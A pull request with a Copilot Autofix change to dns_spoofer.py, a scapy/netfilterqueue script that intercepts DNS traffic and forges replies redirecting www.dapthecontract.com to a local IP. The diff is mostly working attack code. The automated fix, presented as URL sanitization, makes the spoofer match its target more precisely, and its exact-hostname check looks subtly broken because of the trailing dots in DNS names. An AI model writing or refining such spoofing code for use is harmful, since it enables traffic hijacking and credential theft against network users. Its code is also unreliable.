### PR TITLE
Fix code scanning alert no. 1: Incomplete URL substring sanitization

### DIFF
--- a/dns_spoofer.py
+++ b/dns_spoofer.py
@@ -1,13 +1,14 @@
 #! /usr/bin/env python
 import netfilterqueue
 import scapy.all as scapy
-
+from urllib.parse import urlparse
 
 def process_packet(packet):
     scapy_packet = scapy.IP(packet.get_payload())
     if scapy_packet.haslayer(scapy.DNSRR):
-        qname = scapy_packet[scapy.DNSQR].qname
-        if "www.dapthecontract.com" in qname:
+        qname = scapy_packet[scapy.DNSQR].qname.decode()  # Ensure qname is a string
+        hostname = urlparse(f"http://{qname}").hostname  # Parse the hostname
+        if hostname == "www.dapthecontract.com":
             print("[+] Spoofing target")
             answer = scapy.DNSRR(rrname=qname, rdata="192.168.10.128")
             scapy_packet[scapy.DNS].an = answer


### PR DESCRIPTION
Fixes [https://github.com/ztothez/Simple-python-hack-programs/security/code-scanning/1](https://github.com/ztothez/Simple-python-hack-programs/security/code-scanning/1)

To fix the problem, we need to ensure that the URL is properly parsed and validated. Instead of checking if "www.dapthecontract.com" is a substring of `qname`, we should parse the URL and check the hostname directly. This can be done using the `urlparse` function from the `urllib.parse` module.

1. Import the `urlparse` function from the `urllib.parse` module.
2. Parse the `qname` to extract the hostname.
3. Check if the hostname matches "www.dapthecontract.com".


_Suggested fixes powered by Copilot Autofix. Review carefully before merging._
